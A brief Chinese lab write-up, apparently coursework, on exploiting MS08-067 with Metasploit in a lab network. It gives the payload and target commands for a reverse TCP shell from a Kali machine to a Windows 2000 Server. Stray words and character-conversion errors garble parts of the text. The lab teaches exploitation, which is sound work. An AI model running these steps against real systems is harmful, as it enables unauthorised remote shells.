使用Metaspoit攻擊MS08-067,提交正確獲得遠程shell過程的截圖(很多於五張)。shell
MS08-067漏洞的全稱爲「Windows Server服務RPC請求緩衝區溢出漏洞」,若是用戶在受影響的系統上收到特製的 RPC 請求,則該漏洞可能容許遠程執行代碼。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系統上,攻擊者可能未經身份驗證便可利用此漏洞運行任意代碼,此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。windows
本次實驗使用的攻擊機是kali,靶機是Win2kServerapi
攻擊機:192.168.92.147 靶機:192.168.92.148
輸入show payloads會顯示出有效的攻擊載荷,好比shell_reverse_tcp
使用命令set payload generic/shell_reverse_tcp設置攻擊有效載荷
輸入show targets會顯示出能夠被攻擊的靶機的操做系統型號
輸入命令set LHOST + 攻擊機IP,即set LHOST 192.168.92.147; 輸入命令set RHOST + 靶機IP,即set RHOST 192.168.92.148;